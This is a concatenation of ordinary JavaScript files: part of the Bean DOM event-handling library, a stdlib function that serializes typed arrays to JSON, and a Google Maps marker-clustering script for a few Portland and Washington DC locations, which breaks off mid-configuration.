{ // key events
reg: /key/i
, fix: function (event, newEvent) {
newEvent.keyCode = event.keyCode || event.which
return keyProps
}
}
, { // mouse events
reg: /click|mouse(?!(.*wheel|scroll))|menu|drag|drop/i
, fix: function (event, newEvent, type) {
newEvent.rightClick = event.which === 3 || event.button === 2
newEvent.pos = { x: 0, y: 0 }
if (event.pageX || event.pageY) {
newEvent.clientX = event.pageX
newEvent.clientY = event.pageY
} else if (event.clientX || event.clientY) {
newEvent.clientX = event.clientX + doc.body.scrollLeft + root.scrollLeft
newEvent.clientY = event.clientY + doc.body.scrollTop + root.scrollTop
}
if (overOutRegex.test(type)) {
newEvent.relatedTarget = event.relatedTarget
|| event[(type == 'mouseover' ? 'from' : 'to') + 'Element']
}
return mouseProps
}
}
, { // mouse wheel events
reg: /mouse.*(wheel|scroll)/i
, fix: function () { return mouseWheelProps }
}
, { // TextEvent
reg: /^text/i
, fix: function () { return textProps }
}
, { // touch and gesture events
reg: /^touch|^gesture/i
, fix: function () { return touchProps }
}
, { // message events
reg: /^message$/i
, fix: function () { return messageProps }
}
, { // popstate events
reg: /^popstate$/i
, fix: function () { return stateProps }
}
, { // everything else
reg: /.*/
, fix: function () { return commonProps }
}
]
, typeFixerMap = {} // used to map event types to fixer functions (above), a basic cache mechanism
, Event = function (event, element, isNative) {
if (!arguments.length) return
event = event || ((element.ownerDocument || element.document || element).parentWindow || win).event
this.originalEvent = event
this.isNative = isNative
this.isBean = true
if (!event) return
var type = event.type
, target = event.target || event.srcElement
, i, l, p, props, fixer
this.target = target && target.nodeType === 3 ? target.parentNode : target
if (isNative) { // we only need basic augmentation on custom events, the rest expensive & pointless
fixer = typeFixerMap[type]
if (!fixer) { // haven't encountered this event type before, map a fixer function for it
for (i = 0, l = typeFixers.length; i < l; i++) {
if (typeFixers[i].reg.test(type)) { // guaranteed to match at least one, last is .*
typeFixerMap[type] = fixer = typeFixers[i].fix
break
}
}
}
props = fixer(event, this, type)
for (i = props.length; i--;) {
if (!((p = props[i]) in this) && p in event) this[p] = event[p]
}
}
}
// preventDefault() and stopPropagation() are a consistent interface to those functions
// on the DOM, stop() is an alias for both of them together
Event.prototype.preventDefault = function () {
if (this.originalEvent.preventDefault) this.originalEvent.preventDefault()
else this.originalEvent.returnValue = false
}
Event.prototype.stopPropagation = function () {
if (this.originalEvent.stopPropagation) this.originalEvent.stopPropagation()
else this.originalEvent.cancelBubble = true
}
Event.prototype.stop = function () {
this.preventDefault()
this.stopPropagation()
this.stopped = true
}
// stopImmediatePropagation() has to be handled internally because we manage the event list for
// each element
// note that originalElement may be a Bean#Event object in some situations
Event.prototype.stopImmediatePropagation = function () {
if (this.originalEvent.stopImmediatePropagation) this.originalEvent.stopImmediatePropagation()
this.isImmediatePropagationStopped = function () { return true }
}
Event.prototype.isImmediatePropagationStopped = function () {
return this.originalEvent.isImmediatePropagationStopped && this.originalEvent.isImmediatePropagationStopped()
}
Event.prototype.clone = function (currentTarget) {
//TODO: this is ripe for optimisation, new events are *expensive*
// improving this will speed up delegated events
var ne = new Event(this, this.element, this.isNative)
ne.currentTarget = currentTarget
return ne
}
return Event
}())
// if we're in old IE we can't do onpropertychange on doc or win so we use doc.documentElement for both
, targetElement = function (element, isNative) {
return !W3C_MODEL && !isNative && (element === doc || element === win) ? root : element
}
/**
* Bean maintains an internal registry for event listeners. We don't touch elements, objects
* or functions to identify them, instead we store everything in the registry.
* Each event listener has a RegEntry object, we have one 'registry' for the whole instance.
*/
, RegEntry = (function () {
// each handler is wrapped so we can handle delegation and custom events
var wrappedHandler = function (element, fn, condition, args) {
var call = function (event, eargs) {
return fn.apply(element, args ? slice.call(eargs, event ? 0 : 1).concat(args) : eargs)
}
, findTarget = function (event, eventElement) {
return fn.__beanDel ? fn.__beanDel.ft(event.target, element) : eventElement
}
, handler = condition
? function (event) {
var target = findTarget(event, this) // deleated event
if (condition.apply(target, arguments)) {
if (event) event.currentTarget = target
return call(event, arguments)
}
}
: function (event) {
if (fn.__beanDel) event = event.clone(findTarget(event)) // delegated event, fix the fix
return call(event, arguments)
}
handler.__beanDel = fn.__beanDel
return handler
}
, RegEntry = function (element, type, handler, original, namespaces, args, root) {
var customType = customEvents[type]
, isNative
if (type == 'unload') {
// self clean-up
handler = once(removeListener, element, type, handler, original)
}
if (customType) {
if (customType.condition) {
handler = wrappedHandler(element, handler, customType.condition, args)
}
type = customType.base || type
}
this.isNative = isNative = nativeEvents[type] && !!element[eventSupport]
this.customType = !W3C_MODEL && !isNative && type
this.element = element
this.type = type
this.original = original
this.namespaces = namespaces
this.eventType = W3C_MODEL || isNative ? type : 'propertychange'
this.target = targetElement(element, isNative)
this[eventSupport] = !!this.target[eventSupport]
this.root = root
this.handler = wrappedHandler(element, handler, null, args)
}
// given a list of namespaces, is our entry in any of them?
RegEntry.prototype.inNamespaces = function (checkNamespaces) {
var i, j, c = 0
if (!checkNamespaces) return true
if (!this.namespaces) return false
for (i = checkNamespaces.length; i--;) {
for (j = this.namespaces.length; j--;) {
if (checkNamespaces[i] == this.namespaces[j]) c++
}
}
return checkNamespaces.length === c
}
// match by element, original fn (opt), handler fn (opt)
RegEntry.prototype.matches = function (checkElement, checkOriginal, checkHandler) {
return this.element === checkElement &&
(!checkOriginal || this.original === checkOriginal) &&
(!checkHandler || this.handler === checkHandler)
}
return RegEntry
}())
    , registry = (function () {
        // our map stores arrays by event type, just because it's better than storing
        // everything in a single array.
        // uses '$' as a prefix for the keys for safety and 'r' as a special prefix for
        // rootListeners so we can look them up fast
        var map = {}
          // generic functional search of our registry for matching listeners,
          // `fn` returns false to break out of the loop
          , forAll = function (element, type, original, handler, root, fn) {
              var pfx = root ? 'r' : '$'
              if (!type || type == '*') {
                // search the whole registry, recursing once per stored type
                for (var t in map) {
                  if (t.charAt(0) == pfx) {
                    forAll(element, t.substr(1), original, handler, root, fn)
                  }
                }
              } else {
                // element == '*' matches every entry of this type
                var i = 0, l, list = map[pfx + type], all = element == '*'
                if (!list) return
                for (l = list.length; i < l; i++) {
                  if ((all || list[i].matches(element, original, handler)) && !fn(list[i], list, i, type)) return
                }
              }
            }
          , has = function (element, type, original, root) {
              // we're not using forAll here simply because it's a bit slower and this
              // needs to be fast
              var i, list = map[(root ? 'r' : '$') + type]
              if (list) {
                for (i = list.length; i--;) {
                  if (!list[i].root && list[i].matches(element, original, null)) return true
                }
              }
              return false
            }
          , get = function (element, type, original, root) {
              // collect every matching entry; push() returns the new length
              // (always truthy) so the forAll callback never breaks early
              var entries = []
              forAll(element, type, original, null, root, function (entry) {
                return entries.push(entry)
              })
              return entries
            }
          , put = function (entry) {
              // returns true when this is the first non-root entry for this
              // element/type — callers use that to decide whether a DOM-level
              // root listener must be attached. NB: invoked as registry.put(),
              // so `this.has` resolves to the `has` above.
              var has = !entry.root && !this.has(entry.element, entry.type, null, false)
                , key = (entry.root ? 'r' : '$') + entry.type
              ;(map[key] || (map[key] = [])).push(entry)
              return has
            }
          , del = function (entry) {
              // remove the first matching entry only (callback returns false to
              // stop after one splice); drop the whole bucket once it empties
              forAll(entry.element, entry.type, null, entry.handler, entry.root, function (entry, list, i) {
                list.splice(i, 1)
                entry.removed = true
                if (list.length === 0) delete map[(entry.root ? 'r' : '$') + entry.type]
                return false
              })
            }
          // dump all entries, used for onunload
          , entries = function () {
              var t, entries = []
              for (t in map) {
                if (t.charAt(0) == '$') entries = entries.concat(map[t])
              }
              return entries
            }
        return { has: has, get: get, put: put, del: del, entries: entries }
      }())
// we need a selector engine for delegated events, use querySelectorAll if it exists
// but for older browsers we need Qwery, Sizzle or similar
, selectorEngine
, setSelectorEngine = function (e) {
if (!arguments.length) {
selectorEngine = doc.querySelectorAll
? function (s, r) {
return r.querySelectorAll(s)
}
: function () {
throw new Error('Bean: No selector engine installed') // eeek
}
} else {
selectorEngine = e
}
}
// we attach this listener to each DOM event that we need to listen to, only once
// per event type per DOM element
, rootListener = function (event, type) {
if (!W3C_MODEL && type && event && event.propertyName != '_on' + type) return
var listeners = registry.get(this, type || event.type, null, false)
, l = listeners.length
, i = 0
event = new Event(event, this, true)
if (type) event.type = type
// iterate through all handlers registered for this type, calling them unless they have
// been removed by a previous handler or stopImmediatePropagation() has been called
for (; i < l && !event.isImmediatePropagationStopped(); i++) {
if (!listeners[i].removed) listeners[i].handler.call(this, event)
}
}
    // add and remove listeners to DOM elements
    , listener = W3C_MODEL
      ? function (element, type, add, custom, useCapture) {
          // new browsers: a single rootListener per element/type dispatches to
          // all registered handlers
          element[add ? addEvent : removeEvent](type, rootListener, useCapture)
        }
      : function (element, type, add, custom /*, useCapture */) {
          // IE8 and below, use attachEvent/detachEvent and we have to piggy-back propertychange events
          // to simulate event bubbling etc.
          var entry
          if (add) {
            // register an internal root entry wrapping rootListener
            registry.put(entry = new RegEntry(
                element
              , custom || type
              , function (event) { // handler
                  rootListener.call(element, event, custom)
                }
              , rootListener
              , null
              , null
              , true // is root
            ))
            // seed the counter property used to simulate custom events via
            // onpropertychange (fire() increments it, see fireListener)
            if (custom && element['_on' + custom] == null) element['_on' + custom] = 0
            entry.target.attachEvent('on' + entry.eventType, entry.handler)
          } else {
            // find the root entry attached earlier and detach/unregister it
            entry = registry.get(element, custom || type, rootListener, true)[0]
            if (entry) {
              entry.target.detachEvent('on' + entry.eventType, entry.handler)
              registry.del(entry)
            }
          }
        }
, once = function (rm, element, type, fn, originalFn) {
// wrap the handler in a handler that does a remove as well
return function () {
fn.apply(this, arguments)
rm(element, type, originalFn)
}
}
    // removes all listeners on `element` matching the (namespace-stripped)
    // type, optional original handler fn and optional namespace list; detaches
    // the DOM-level rootListener for any type that ends up with no listeners
    , removeListener = function (element, orgType, handler, namespaces, useCapture) {
        var type = orgType && orgType.replace(nameRegex, '')
          , handlers = registry.get(element, type, null, false)
          , removed = {}
          , i, l
        for (i = 0, l = handlers.length; i < l; i++) {
          if ((!handler || handlers[i].original === handler) && handlers[i].inNamespaces(namespaces)) {
            // TODO: this is problematic, we have a registry.get() and registry.del() that
            // both do registry searches so we waste cycles doing this. Needs to be rolled into
            // a single registry.forAll(fn) that removes while finding, but the catch is that
            // we'll be splicing the arrays that we're iterating over. Needs extra tests to
            // make sure we don't screw it up. @rvagg
            registry.del(handlers[i])
            // remember each affected eventType once so we can prune below
            if (!removed[handlers[i].eventType] && handlers[i][eventSupport])
              removed[handlers[i].eventType] = { t: handlers[i].eventType, c: handlers[i].type }
          }
        }
        // check each type/element for removed listeners and remove the rootListener where it's no longer needed
        for (i in removed) {
          if (!registry.has(element, removed[i].t, null, false)) {
            // last listener of this type, remove the rootListener
            listener(element, removed[i].t, false, removed[i].c, useCapture)
          }
        }
      }
// set up a delegate helper using the given selector, wrap the handler function
, delegate = function (selector, fn) {
//TODO: findTarget (therefore $) is called twice, once for match and once for
// setting e.currentTarget, fix this so it's only needed once
var findTarget = function (target, root) {
var i, array = isString(selector) ? selectorEngine(selector, root) : selector
for (; target && target !== root; target = target.parentNode) {
for (i = array.length; i--;) {
if (array[i] === target) return target
}
}
}
, handler = function (e) {
var match = findTarget(e.target, this)
if (match) fn.apply(match, arguments)
}
// __beanDel isn't pleasant but it's a private function, not exposed outside of Bean
handler.__beanDel = {
ft : findTarget // attach it here for customEvents to use too
, selector : selector
}
return handler
}
    // trigger a DOM-level event: real dispatchEvent() on W3C browsers; on
    // legacy IE either fireEvent (native) or a '_on<type>' counter bump that
    // the onpropertychange rootListener picks up (custom)
    , fireListener = W3C_MODEL ? function (isNative, type, element) {
        // modern browsers, do a proper dispatchEvent()
        var evt = doc.createEvent(isNative ? 'HTMLEvents' : 'UIEvents')
        evt[isNative ? 'initEvent' : 'initUIEvent'](type, true, true, win, 1)
        element.dispatchEvent(evt)
      } : function (isNative, type, element) {
        // old browser use onpropertychange, just increment a custom property to trigger the event
        element = targetElement(element, isNative)
        isNative ? element.fireEvent('on' + type, doc.createEventObject()) : element['_on' + type]++
      }
    /**
      * Public API: off(), on(), add(), (remove()), one(), fire(), clone()
      */
    /**
      * off(element[, eventType(s)[, handler ], options])
      *
      * Removes listeners from `element`: all of them, by type, by
      * type+namespace, by handler fn, or by an object map of type -> fn.
      * Returns `element` for chaining.
      */
    , off = function (element, typeSpec, fn) {
        var isTypeStr = isString(typeSpec),
            defaultOpts = {
              useCapture: false
            }
          , opts = buildOptions(defaultOpts, arguments[arguments.length - 1])
          , k, type, namespaces, i
        if (isTypeStr && typeSpec.indexOf(' ') > 0) {
          // off(el, 't1 t2 t3', fn) or off(el, 't1 t2 t3')
          typeSpec = str2arr(typeSpec)
          for (i = typeSpec.length; i--;)
            off(element, typeSpec[i], fn)
          return element
        }
        // strip any '.namespace' suffix to get the bare event type
        type = isTypeStr && typeSpec.replace(nameRegex, '')
        if (type && customEvents[type]) type = customEvents[type].base
        if (!typeSpec || isTypeStr) {
          // off(el) or off(el, t1.ns) or off(el, .ns) or off(el, .ns1.ns2.ns3)
          if (namespaces = isTypeStr && typeSpec.replace(namespaceRegex, '')) namespaces = str2arr(namespaces, '.')
          removeListener(element, type, fn, namespaces, opts.useCapture)
        } else if (isFunction(typeSpec)) {
          // off(el, fn)
          removeListener(element, null, typeSpec, null, opts.useCapture)
        } else {
          // off(el, { t1: fn1, t2: fn2 })
          for (k in typeSpec) {
            if (typeSpec.hasOwnProperty(k)) off(element, k, typeSpec[k])
          }
        }
        return element
      }
    /**
      * on(element, eventType(s)[, selector], handler[, args ], [options])
      *
      * Registers `fn` for each whitespace-separated (and possibly
      * '.namespaced') type in `events`. With a `selector`, the handler is
      * wrapped by delegate(). Called with `this === ONE` (see one()) the
      * handler self-removes after its first invocation. Returns `element`.
      */
    , on = function(element, events, selector, fn) {
        var defaultOpts = {
              useCapture: false
            },
            originalFn, type, types, i, args, entry, first, opts
        //TODO: the undefined check means you can't pass an 'args' argument, fix this perhaps?
        if (selector === undefined && typeof events == 'object') {
          //TODO: this can't handle delegated events
          // object form on(el, { t1: fn1, ... }): recurse once per type
          for (type in events) {
            if (events.hasOwnProperty(type)) {
              on.call(this, element, type, events[type])
            }
          }
          return
        }
        if (!isFunction(selector)) {
          // delegated event
          originalFn = fn
          args = slice.call(arguments, 4)
          fn = delegate(selector, originalFn, selectorEngine)
        } else {
          // no selector: 3rd argument is actually the handler
          args = slice.call(arguments, 3)
          fn = originalFn = selector
        }
        opts = buildOptions(defaultOpts, args[args.length - 1])
        types = str2arr(events)
        // special case for one(), wrap in a self-removing handler
        if (this === ONE) {
          fn = once(off, element, events, fn, originalFn)
        }
        for (i = types.length; i--;) {
          // add new handler to the registry and check if it's the first for this element/type
          first = registry.put(entry = new RegEntry(
              element
            , types[i].replace(nameRegex, '') // event type
            , fn
            , originalFn
            , str2arr(types[i].replace(namespaceRegex, ''), '.') // namespaces
            , args
            , false // not root
          ))
          if (entry[eventSupport] && first) {
            // first event of this type on this element, add root listener
            listener(element, entry.eventType, true, entry.customType, opts.useCapture)
          }
        }
        return element
      }
/**
* add(element[, selector], eventType(s), handler[, args ])
*
* Deprecated: kept (for now) for backward-compatibility
*/
, add = function (element, events, fn, delfn, options) {
return on.apply(
null
, !isString(fn)
? slice.call(arguments)
: [ element, fn, events, delfn ].concat(arguments.length > 3 ? slice.call(arguments, 4) : [])
)
}
    /**
      * one(element, eventType(s)[, selector], handler[, args ])
      *
      * Same as on() but the handler is removed after its first invocation;
      * the ONE sentinel as `this` tells on() to wrap the handler via once().
      */
    , one = function () {
        return on.apply(ONE, arguments)
      }
/**
* fire(element, eventType(s)[, args ])
*
* The optional 'args' argument must be an array, if no 'args' argument is provided
* then we can use the browser's DOM event system, otherwise we trigger handlers manually
*/
, fire = function (element, type, args) {
var types = str2arr(type)
, i, j, l, names, handlers
for (i = types.length; i--;) {
type = types[i].replace(nameRegex, '')
if (names = types[i].replace(namespaceRegex, '')) names = str2arr(names, '.')
if (!names && !args && element[eventSupport]) {
fireListener(nativeEvents[type], type, element)
} else {
// non-native event, either because of a namespace, arguments or a non DOM element
// iterate over all listeners and manually 'fire'
handlers = registry.get(element, type, null, false)
args = [false].concat(args)
for (j = 0, l = handlers.length; j < l; j++) {
if (handlers[j].inNamespaces(names)) {
handlers[j].handler.apply(element, args)
}
}
}
}
return element
}
/**
* clone(dstElement, srcElement[, eventType ])
*
* TODO: perhaps for consistency we should allow the same flexibility in type specifiers?
*/
, clone = function (element, from, type) {
var handlers = registry.get(from, type, null, false)
, l = handlers.length
, i = 0
, args, beanDel
for (; i < l; i++) {
if (handlers[i].original) {
args = [ element, handlers[i].type ]
if (beanDel = handlers[i].handler.__beanDel) args.push(beanDel.selector)
args.push(handlers[i].original)
on.apply(null, args)
}
}
return element
}
    // the public API object returned by this module
    , bean = {
        'on' : on
      , 'add' : add // deprecated legacy-argument-order alias
      , 'one' : one
      , 'off' : off
      , 'remove' : off // 'remove' is an alias of off()
      , 'clone' : clone
      , 'fire' : fire
      , 'Event' : Event
      , 'setSelectorEngine' : setSelectorEngine
      , 'noConflict' : function () {
          // restore whatever previously occupied this global name
          context[name] = old
          return this
        }
      }
    // for IE, clean up on unload to avoid leaks
    if (win.attachEvent) {
      var cleanup = function () {
        // detach everything except 'unload' handlers — those self-clean via
        // the once() wrapper added in RegEntry
        var i, entries = registry.entries()
        for (i in entries) {
          if (entries[i].type && entries[i].type !== 'unload') off(entries[i].element, entries[i].type)
        }
        win.detachEvent('onunload', cleanup)
        // hint the JScript engine to collect now that references are gone
        win.CollectGarbage && win.CollectGarbage()
      }
      win.attachEvent('onunload', cleanup)
    }
    // initialize selector engine to internal default (qSA or throw Error)
    setSelectorEngine()
    return bean
});
|
/**
* @license Apache-2.0
*
* Copyright (c) 2018 The Stdlib Authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
'use strict';
// MODULES //
var isTypedArray = require( '@stdlib/assert-is-typed-array' );
var isComplexTypedArray = require( '@stdlib/assert-is-complex-typed-array' );
var reinterpret64 = require( '@stdlib/strided-base-reinterpret-complex64' );
var reinterpret128 = require( '@stdlib/strided-base-reinterpret-complex128' );
var typeName = require( './type.js' );
// MAIN //
/**
* Returns a JSON representation of a typed array.
*
* ## Notes
*
* -   We build a JSON object representing a typed array similar to how Node.js `Buffer` objects are represented. See [Buffer][1].
*
* [1]: https://nodejs.org/api/buffer.html#buffer_buf_tojson
*
* @param {TypedArray} arr - typed array to serialize
* @throws {TypeError} first argument must be a typed array
* @returns {Object} JSON representation
*
* @example
* var Float64Array = require( '@stdlib/array-float64' );
*
* var arr = new Float64Array( [ 5.0, 3.0 ] );
* var json = toJSON( arr );
* // returns { 'type': 'Float64Array', 'data': [ 5.0, 3.0 ] }
*/
function toJSON( arr ) {
	var view;
	var out;
	var i;

	// Resolve a real-valued view over the array's elements...
	if ( isTypedArray( arr ) ) {
		view = arr;
	} else if ( isComplexTypedArray( arr ) ) {
		// Reinterpret interleaved [re, im] pairs as a real-valued typed array:
		view = ( arr.BYTES_PER_ELEMENT === 8 ) ? reinterpret64( arr, 0 ) : reinterpret128( arr, 0 );
	} else {
		throw new TypeError( 'invalid argument. Must provide a typed array. Value: `' + arr + '`.' );
	}
	// Assemble the Buffer-like serialization object:
	out = {
		'type': typeName( arr ),
		'data': []
	};
	for ( i = 0; i < view.length; i++ ) {
		out.data.push( view[ i ] );
	}
	return out;
}
// EXPORTS //
module.exports = toJSON;
|
/**
* @file
 * Loading and initializing a javascript google map clustering library
*
* This is specifically to be used for marker clustering
* Docs: https://developers.google.com/maps/documentation/javascript/marker-clustering
*/
require('gmaps-marker-clusterer');
// single shared InfoWindow — reused so at most one popup is open at a time
var infowindow = new google.maps.InfoWindow();
// bounds grow as markers are placed (see placeMarker); consumed by fitBounds()
var bounds = new google.maps.LatLngBounds();
// the clustered map, rendered into the #markercluster element
var map_mc = new google.maps.Map(document.getElementById('markercluster'), {
  // disable default UI and add our own settings
  // https://developers.google.com/maps/documentation/javascript/controls#DisablingDefaults
  disableDefaultUI: true,
  fullscreenControl: true,
  scrollwheel: false,
  zoomControl: true,
  zoom: 10
  // N/A - we are centering using bounds
  // center: new google.maps.LatLng(45.5506509, -122.6624718)
});
// each entry: [display name, latitude, longitude, city label]
var locations_mc = [
  ['CHIEF PDX', 45.5506509, -122.6624718, 'Portland, OR'],
  ['New Seasons Market Williams', 45.548012, -122.667328, 'Portland, OR'],
  ['La Taq', 45.5628801, -122.6483659, 'Portland, OR'],
  ['Alberta Park', 45.564469, -122.645104, 'Portland, OR'],
  ['Fernhill Park', 45.5661579, -122.6256046, 'Portland, OR'],
  ['CHIEF DC', 38.9089576, -77.0422005, 'Washington, DC']
];
// create array for clustered points
var cluster = [];
// Creates a marker for one `location` entry ([name, lat, lng, cityLabel]),
// wires up its InfoWindow click handler, collects it for clustering and
// extends the shared bounds.
function placeMarker(location) {
  var latLng = new google.maps.LatLng(location[1], location[2]);
  // NOTE: created deliberately WITHOUT a `map` option — MarkerClusterer takes
  // ownership and attaches/detaches markers as clusters form. (The previous
  // `map_mc: map_mc` entry was not a valid google.maps MarkerOptions key and
  // had no effect, so it has been removed.)
  var marker2 = new google.maps.Marker({
    position: latLng,
    icon: 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACMAAAAtCAYAAAAk09IpAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA4ZpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTMyIDc5LjE1OTI4NCwgMjAxNi8wNC8xOS0xMzoxMzo0MCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtcE1NOk9yaWdpbmFsRG9jdW1lbnRJRD0ieG1wLmRpZDpkMWJiOTlkOC0zODFlLTQxZDQtOTM0Ny05YzFjZGEzOGZjMDIiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6RTRFRDdFOEE4MzNGMTFFN0JGM0Q5MUVFQUI0RkIyRTAiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6RTRFRDdFODk4MzNGMTFFN0JGM0Q5MUVFQUI0RkIyRTAiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTcgKE1hY2ludG9zaCkiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDozODhhNTJiOS03YWMwLTQ1NGEtOWUxOC0xYTNmZDkzZTYwM2UiIHN0UmVmOmRvY3VtZW50SUQ9ImFkb2JlOmRvY2lkOnBob3Rvc2hvcDoyODFhNTBkMC1lNDU2LTExN2EtOTQ2ZC1jMjBlYzExNjVmZjIiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2tldCBlbmQ9InIiPz7gv1QSAAAFJklEQVR42sxYe1BUZRQ/vAUlaZH3W5ZdHssib4i8hSAcHhVmWUk04dBjJscyrT8a/rFybMpGJ5vp8U+lhiVR/GHOuI0oNELBIjQQA/EQXF4BoYC6sAt0znJ3ZrGdvd/dB9OZOfN9937nnu93z3de9zosLy/D/4WchT5wdaQ7GoctyLHIm5GjkN245XvIzcityG3IHXz6dgZKhYNBEPk47EYuab4x6DMydgcmJudgfGIWdLpFvYyrqzNEhHqnh4WIICUpYgZv1SBXI19k2cOB75gQRCIORzu6RopU7begFXl2TsOr2H2dCygSQiEpMRTi44Iu461K5N/NWcYsGARSjsMnX1c1eVy73muxL6QlR8L+0pQFnB4mfYLBIJCTDU19B+saeuDm0JTVzhngvxFyM6WQnSE5jZcHmH0GgZxAEAerfmgB3eKSTSJlFH3sXDX5NryGgHQ4vvGgjKMJIKWNzQOHvvtRZTMgBlpaWoaqGhXgi76Ol6+aBYNAwnH4go5mQbtol1xCkVf3aw9N6bjizFnm+IXaG+69AxN2TW7qkdtw9kIz7X3SJBi0inxIPb330i+da5Jtr9R3Q1fPWC7um2PKMgc4860Z1a+ki4pV0YTognEopoQmhORRwVCSJYe4zYH668aOfjivbIHhidtMz//ROUxDAe4fiSHeZwjt9N9UN31YMquBSndth6MVxavuKaQhsC9/O7zzWS1cauQ/7vsaLVnnocxUcTZe9hmOKUlIYitIlf0HiIG8NrjDp4efARlnLT66NTxNQ4Kxz8RS4WMhT491UPliAa9cZXkBG5gRPZh4YzB+d2bYjkga5gd+Ik9euXhxEARu2sgrd/culSwQmczALJZhITcXZ4gM8uGVc3LSQ9Aag3Fi7fjuaxaY5LSYaQdGJwW9qAHM5Ib1bkwPtPeqYWxqhleupWsQ1H/zh7i3aD0NQ8Zgen19PNksM6+Fj75V8sp9eE7JpC/IX+9XncZg6qKj/JjNWXO1DT44c9nk2j08xkOnqqHtLzWTLonYV5+MjfuZa8lbw8exf/GbmWWLqs9/aoB23LAwTQYx4QGwoNPBn/2j8P2VVugZGmfS4bvJE2QxgX2GdtSZ67ZGMSV/k74j8sjPSvZC2dQ5oGeKiEULep+0HfRxAWdx/+kHQ/v0nscSNQ97eQhWagkQ2qc4f8uccU/saNSLkke/W/SobE0qduHKPsdx3ymTzRUuHMP+tD4/J8auQHY9Egs5GZLrOD1mtgdGKt9bslUTI/G3CxDS+/QTCoqS55GXzYKhvoIE0UJ2AcPpJSD9vF8HHKDqbfLQ8+jQNgWCFgfUe4b75AUmMBy9XJAXN5CUGGYTIBkpYkBf7Ca9fLXJlHWoAO0ns7q6OFkFhOoedzz7qKIIBsMBojLxMZnXGiopTIDwENF7OFWxVG1zgN7Et2rOzZJaBCRvZzRZpZ77CwFWgeHohef2JC2FBosEAYkI84Znn9xG39UvCeln+KzThcMrQsM9Z0Wevou6bQaGA/RlVqr44u4iOZM8pYW05MhanH4ltNNjpbKifJlakRBiVojWMS1QQ1NmSdvJap1/qFxkp0v0/+9M/rHEdoLWSQ55xm5gOEDKuOiAE1hfTK4/9bgCcP0UTpVCdTtamDqOoHPW41GsdthMKeRlR1PX9rYlSi0Cg9ahaluGTjpP4UtEv1uz06MMxzO/ZmA4QIMU7hS+K0AkEBTgVWHo9C0hB2t/12Pv/BYVZFj5Af2+BS9lOzC2pH8FGACHpLs3zjjqTgAAAABJRU5ErkJggg==',
  });
  // add markers to cluster array so MarkerClusterer can manage them
  cluster.push(marker2);
  google.maps.event.addListener(marker2, 'click', function () {
    infowindow.close(); // Close previously opened infowindow
    // Set infowindow content
    infowindow.setContent("<div id='infowindow'><div><strong>" + location[0] + "</strong></div><div>" + location[3] + "</div></div>");
    infowindow.open(map_mc, marker2);
  });
  // grow the shared bounds so fitBounds() can frame every marker
  bounds.extend(latLng);
}
// place a marker (and extend the shared bounds) for every location
var i = 0;
while (i < locations_mc.length) {
  placeMarker(locations_mc[i]);
  i += 1;
}
// Sets the viewport to contain the given bounds
map_mc.fitBounds(bounds);
// Add a marker cluster to manage the markers
var markerCluster = new MarkerClusterer(map_mc, cluster, {
// define our custom settings (see https://googlemaps.github.io/js-marker-clusterer/docs/reference.html for additional options)
// grid size of a cluster in pixels
gridSize: 34,
// maximum zoom level that a marker can be part of a cluster
maxZoom: 12,
// marker cluster requires 5 images (see https://googlemaps.github.io/js-marker-clusterer/examples/advanced_example.html)
// cluster images are determined based on how many pins are included in the cluster
// include path/image prefix to custom images (e.g images/m1.png, images/m2.png, etc)
//imagePath: '/images/m',
// alternatively, we can define individual images using styles
// this example uses the same image for each of the 5 sizes
styles: [
{
